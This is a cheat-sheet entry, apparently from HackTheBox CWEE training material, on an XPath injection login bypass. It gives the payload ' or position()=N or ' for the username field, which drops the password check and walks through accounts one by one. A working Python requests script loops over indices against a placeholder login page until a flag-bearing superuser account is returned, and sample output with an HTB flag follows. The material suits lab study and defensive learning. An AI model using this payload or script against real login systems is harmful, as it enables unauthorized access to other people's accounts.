Auth bypass

XPath authentication bypass via position() account walk

Iterates accounts in an XPath login filter by injecting position()=N into the username field.

The login query is typically //user[username='INPUT' and password='INPUT']. Injecting ' or position()=N or ' into username rewrites the predicate so the password check is bypassed and the Nth account node is selected instead. Looping N over a small range walks every account one at a time; the loop stops on a success marker (here a flag substring) that indicates a privileged or flag-bearing account was returned. A plain ' or '1'='1 only ever returns the first matching node, so position() is what makes each distinct account reachable.

import requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
s = requests.Session()

LOGIN = "https://target/login.php"

# Server filter ~ //user[username='INPUT' and password='INPUT'].
# The payload drops the password check and selects the Nth account node.
def login_as(index):
    data = {"username": f"' or position()={index} or '", "password": "x"}
    r = s.post(LOGIN, data=data, verify=False, proxies=PROXIES)
    return r.text

for i in range(0, 100):
    body = login_as(i)
    if "HTB" in body:                       # success marker: flag / privileged page
        print(f"[+] account index {i} returned a flag")
        print(body)
        break
    print(f"[-] index {i}")

success body

[+] account index 3 returned a flag
<h2>Welcome superuser!</h2><p>HTB{baa4759ac0d153ec234a72df5d99bf56}</p>

_{Find by: xpath auth bypass login position() account enumeration walk users flag · Source: CWEE/XPath Injection - Authentication Bypass}

In-band